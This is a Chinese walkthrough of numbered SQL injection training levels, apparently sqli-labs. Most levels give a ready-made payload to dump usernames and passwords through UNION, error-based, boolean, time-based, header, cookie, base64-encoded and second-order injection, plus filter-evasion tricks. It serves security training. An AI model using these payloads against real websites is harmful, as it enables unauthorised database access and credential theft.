第一关:
注入点:‘连接的字符串

数据脱库:
-1’ union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3-- -

第二关:
注入点:数值型

数据脱库:
-1 union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3–

第三关:
注入点:’)分割字符型

数据脱库:
?id=-1’) union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3–

第四关:
注入点:")分割字符型

数据脱库:
?id=-1") union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3–

第五关:
注入点:单引号为边界的字符串错误注入

数据脱库:
?id=1’ and updatexml(1,concat(0x7e,(select substring(group_concat(schema_name) ,1,20)from information_schema.schemata)),1)-- -

第六关:
注入点:双引号为边界的字符串错误注入

数据脱库:

第七关:
注入点:’))为边界的字符串布尔注入

查看数据库长度:
?id=1’)) and (length(database()))=8-- -

第八关:
注入点:单引号为边界的字符串布尔注入

查看数据库长度:
?id=1’ and (length(database()))=8-- -

第九关:
注入点:’延时注入

查看数据库长度:
?id=2’ and if(length(database())=8,sleep(5),0)-- -

第十关:
注入点:双引号延时注入

查看数据库长度:
?id=2" and if(length(database())=8,sleep(5),0)-- -

第十一关:
注入点:单引号为边界的字符串union注入

数据脱库:

第十二关:
注入点:”)为边界的字符串union注入

数据脱库:

第十三关:
注入点:’)边界的字符串报错注入

数据脱库:

第十四关:
注入点:”边界的字符串报错注入

数据脱库:

第十五关:
注入点:单引号布尔
查看数据库长度:

第十六关:
注入点:双引号括号布尔
查看数据库长度:

第十七关:
注入点:基于单引号报错
数据脱库:

第十八关:
注入点:单引号http头部User-Agent注入
数据脱库:
1’ and updatexml(1,concat(0x7e,(select substring(group_concat(concat_ws(0x7e,username,password)) ,1,20)from security.users)),1) and ‘1’=‘1

第十九关:
注入点:单引号http头部Referer注入
数据脱库:

第二十关:
注入点:单引号cookie
数据脱库:更改coolie后forward
Cookie: uname=admin’and updatexml(1,concat(0x7e,(select substring(group_concat(concat_ws(0x7e,username,password)) ,1,20)from security.users)),1)-- -

第二十一关:
注入点:’)cookie加base64解码
数据脱库:
YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBzdWJzdHJpbmcoZ3JvdXBfY29uY2F0KGNvbmNhdF93cygweDdlLHVzZXJuYW1lLHBhc3N3b3JkKSkgLDEsMjApZnJvbSBzZWN1cml0eS51c2VycykpLDEpLS0gLQ==

第二十二关:
注入点:”cookie加base64解码(题显示还是21,实际是22)
数据脱库:
YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHN1YnN0cmluZyhncm91cF9jb25jYXQoY29uY2F0X3dzKDB4N2UsdXNlcm5hbWUscGFzc3dvcmQpKSAsMSwyMClmcm9tIHNlY3VyaXR5LnVzZXJzKSksMSktLSAt

第二十三关:
注入点:’过滤#、–、+
数据脱库:将注释改为’
?id=-1’ union select 1,(select group_concat(concat_ws(0x7e,username,password))from security.users),3’

第二十四关:
注入点:二次注入
数据脱库:注册一个admin-- -用户,修改密码时直接修改了admin的密码

第二十五关:
注入点:单引号报错,屏蔽or and
数据脱库:关键字套关键字
?id=-1’ anandd updatexml(1,concat(0x7e,(select substring(group_concat(concat_ws(0x7e,username,passwoorrd)) ,1,20)from security.users)),1)-- -

第二十五a关:
注入点:数值 屏蔽or and #
数据脱库:延时或联合
?id=-1 union select 1,(select group_concat(concat_ws(0x7e,username,passwoorrd))from security.users),3-- -

SQL注入攻击详解
本文深入解析了25种不同类型的SQL注入攻击案例,包括常见的字符串注入、数值型注入、布尔注入及延迟注入等,详细展示了如何利用特定的SQL语法绕过网站的安全防护,实现数据脱库的过程。
915





